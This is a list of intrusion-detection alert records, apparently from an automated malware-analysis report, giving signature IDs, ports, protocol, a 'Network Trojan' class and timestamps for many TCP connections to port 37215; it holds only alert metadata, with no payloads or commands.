            SID:2835222
            Source Port:51420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934116
            SID:2829579
            Source Port:36982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321596
            SID:2829579
            Source Port:58742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.762209
            SID:2829579
            Source Port:42954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617891
            SID:2829579
            Source Port:58720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639614
            SID:2829579
            Source Port:52938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.597382
            SID:2829579
            Source Port:40500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605029
            SID:2829579
            Source Port:45624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.419491
            SID:2829579
            Source Port:45526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046420
            SID:2829579
            Source Port:36792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374168
            SID:2829579
            Source Port:42112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748427
            SID:2835222
            Source Port:59212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.776471
            SID:2835222
            Source Port:41886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778143
            SID:2829579
            Source Port:42960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.070954
            SID:2835222
            Source Port:51372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869310
            SID:2835222
            Source Port:41404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916588
            SID:2829579
            Source Port:42852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508128
            SID:2835222
            Source Port:58296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.721997
            SID:2829579
            Source Port:52452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.992558
            SID:2835222
            Source Port:59842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445172
            SID:2829579
            Source Port:50034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717331
            SID:2835222
            Source Port:39720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.059719
            SID:2829579
            Source Port:44418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045788
            SID:2835222
            Source Port:33218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.881025
            SID:2829579
            Source Port:49624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850302
            SID:2829579
            Source Port:34796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444807
            SID:2835222
            Source Port:57250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851274
            SID:2835222
            Source Port:44276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.006547
            SID:2835222
            Source Port:38924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776852
            SID:2829579
            Source Port:38910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318539
            SID:2835222
            Source Port:54728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.024568
            SID:2835222
            Source Port:57706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.491286
            SID:2835222
            Source Port:44272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.570635
            SID:2829579
            Source Port:59412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519945
            SID:2835222
            Source Port:44218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855028
            SID:2835222
            Source Port:40438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850278
            SID:2835222
            Source Port:58580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392405
            SID:2829579
            Source Port:38426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808038
            SID:2835222
            Source Port:58820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.275034
            SID:2829579
            Source Port:56784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510013
            SID:2835222
            Source Port:56062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300237
            SID:2829579
            Source Port:43242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.491256
            SID:2835222
            Source Port:54446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810343
            SID:2835222
            Source Port:57252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826045
            SID:2835222
            Source Port:48880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994734
            SID:2829579
            Source Port:36922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.804739
            SID:2835222
            Source Port:37688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.326235
            SID:2829579
            Source Port:56458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423016
            SID:2829579
            Source Port:36292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696795
            SID:2829579
            Source Port:58516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180571
            SID:2829579
            Source Port:55558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994703
            SID:2835222
            Source Port:45024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709975
            SID:2829579
            Source Port:35346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352221
            SID:2829579
            Source Port:46072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728783
            SID:2835222
            Source Port:58248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928916
            SID:2835222
            Source Port:37820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.760253
            SID:2829579
            Source Port:55388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290841
            SID:2835222
            Source Port:53992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855365
            SID:2835222
            Source Port:43220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.904977
            SID:2835222
            Source Port:36380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777355
            SID:2835222
            Source Port:44054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811112
            SID:2835222
            Source Port:55688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.517559
            SID:2829579
            Source Port:49648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.820021
            SID:2829579
            Source Port:38040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020486
            SID:2835222
            Source Port:48034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.414294
            SID:2829579
            Source Port:52122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.947821
            SID:2829579
            Source Port:36360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766776
            SID:2829579
            Source Port:34742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910169
            SID:2829579
            Source Port:48338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444717
            SID:2829579
            Source Port:49048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969130
            SID:2829579
            Source Port:35794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782788
            SID:2835222
            Source Port:44558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923416
            SID:2835222
            Source Port:39238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.564966
            SID:2835222
            Source Port:33934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.005748
            SID:2835222
            Source Port:51594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953252
            SID:2835222
            Source Port:60242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760201
            SID:2829579
            Source Port:52066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444640
            SID:2835222
            Source Port:39142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.182183
            SID:2835222
            Source Port:33424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990091
            SID:2835222
            Source Port:38272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510226
            SID:2835222
            Source Port:37092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058583
            SID:2835222
            Source Port:36506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873628
            SID:2835222
            Source Port:37628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855691
            SID:2829579
            Source Port:34092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.897659
            SID:2835222
            Source Port:57308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.705013
            SID:2829579
            Source Port:53718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052382
            SID:2829579
            Source Port:59738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864680
            SID:2829579
            Source Port:51620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931956
            SID:2829579
            Source Port:42034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064666
            SID:2829579
            Source Port:47152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.558941
            SID:2829579
            Source Port:46162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.646377
            SID:2829579
            Source Port:51042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.622419
            SID:2835222
            Source Port:55598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.072780
            SID:2829579
            Source Port:36812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.867995
            SID:2829579
            Source Port:44204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333859
            SID:2835222
            Source Port:47376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.882046
            SID:2829579
            Source Port:56390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.403575
            SID:2829579
            Source Port:51186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880854
            SID:2835222
            Source Port:59646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712100
            SID:2835222
            Source Port:35852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.334890
            SID:2835222
            Source Port:51036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508013
            SID:2829579
            Source Port:46638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261509
            SID:2835222
            Source Port:54216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737796
            SID:2835222
            Source Port:53078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.006678
            SID:2835222
            Source Port:59814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.382534
            SID:2829579
            Source Port:44560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773851
            SID:2835222
            Source Port:40786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.574143
            SID:2835222
            Source Port:50264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778824
            SID:2835222
            Source Port:58344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713653
            SID:2829579
            Source Port:52984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.019310
            SID:2829579
            Source Port:48924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.875549
            SID:2829579
            Source Port:41680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956884
            SID:2835222
            Source Port:38238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887912
            SID:2835222
            Source Port:52348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.386280
            SID:2835222
            Source Port:56612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723591
            SID:2829579
            Source Port:37792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809083
            SID:2829579
            Source Port:55128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.792791
            SID:2829579
            Source Port:50682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343843
            SID:2835222
            Source Port:48358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068205
            SID:2829579
            Source Port:55842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.480363
            SID:2829579
            Source Port:52878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.867972
            SID:2829579
            Source Port:37972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.698140
            SID:2829579
            Source Port:45950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935915
            SID:2829579
            Source Port:36944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.579627
            SID:2829579
            Source Port:37358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.386227
            SID:2829579
            Source Port:45668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.590675
            SID:2829579
            Source Port:52084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779137
            SID:2835222
            Source Port:33784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746178
            SID:2829579
            Source Port:46966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.409066
            SID:2829579
            Source Port:55096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967902
            SID:2829579
            Source Port:53050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.652384
            SID:2829579
            Source Port:58910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753715
            SID:2829579
            Source Port:34858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765298
            SID:2829579
            Source Port:49508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470487
            SID:2835222
            Source Port:58460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421541
            SID:2835222
            Source Port:51324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675590
            SID:2835222
            Source Port:51600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.296593
            SID:2829579
            Source Port:52266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.948983
            SID:2835222
            Source Port:43738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371314
            SID:2829579
            Source Port:44270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764633
            SID:2829579
            Source Port:54016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669860
            SID:2835222
            Source Port:46388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304243
            SID:2835222
            Source Port:36850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.966672
            SID:2829579
            Source Port:36924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956219
            SID:2835222
            Source Port:36876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.403402
            SID:2829579
            Source Port:48266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893304
            SID:2829579
            Source Port:46336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754374
            SID:2835222
            Source Port:39298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.262077
            SID:2829579
            Source Port:37250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804392
            SID:2829579
            Source Port:40616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827850
            SID:2835222
            Source Port:60922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.993958
            SID:2835222
            Source Port:40418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057898
            SID:2835222
            Source Port:33468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895488
            SID:2829579
            Source Port:53760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038233
            SID:2835222
            Source Port:35392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435410
            SID:2835222
            Source Port:48482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.943005
            SID:2835222
            Source Port:36844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967951
            SID:2829579
            Source Port:59910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.379837
            SID:2835222
            Source Port:53216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.025858
            SID:2835222
            Source Port:56248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.481056
            SID:2835222
            Source Port:36332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.818347
            SID:2829579
            Source Port:43630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928193
            SID:2829579
            Source Port:50352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919943
            SID:2829579
            Source Port:48638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760127
            SID:2829579
            Source Port:32820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979520
            SID:2835222
            Source Port:60848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869441
            SID:2835222
            Source Port:48076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.559017
            SID:2835222
            Source Port:59322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.831662
            SID:2829579
            Source Port:49738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.645698
            SID:2835222
            Source Port:52672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777202
            SID:2829579
            Source Port:45644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860658
            SID:2835222
            Source Port:40442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865531
            SID:2835222
            Source Port:59308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052435
            SID:2829579
            Source Port:51116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.275096
            SID:2829579
            Source Port:37062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.915993
            SID:2829579
            Source Port:48512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.185149
            SID:2829579
            Source Port:34342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308216
            SID:2829579
            Source Port:39062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777403
            SID:2829579
            Source Port:39418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778438
            SID:2835222
            Source Port:52500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061355
            SID:2835222
            Source Port:55266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714806
            SID:2829579
            Source Port:59742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945050
            SID:2829579
            Source Port:39336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.048116
            SID:2829579
            Source Port:53670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.762068
            SID:2829579
            Source Port:45998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.999315
            SID:2835222
            Source Port:36074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334147
            SID:2829579
            Source Port:44774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261028
            SID:2835222
            Source Port:58726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825286
            SID:2829579
            Source Port:46258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.658174
            SID:2835222
            Source Port:59906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.873545
            SID:2835222
            Source Port:49600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842135
            SID:2835222
            Source Port:52252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.739038
            SID:2829579
            Source Port:43822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.854502
            SID:2835222
            Source Port:58764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963593
            SID:2829579
            Source Port:43016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848239
            SID:2829579
            Source Port:36986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.115958
            SID:2835222
            Source Port:32856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.516020
            SID:2829579
            Source Port:43594
            Destination Port:37215
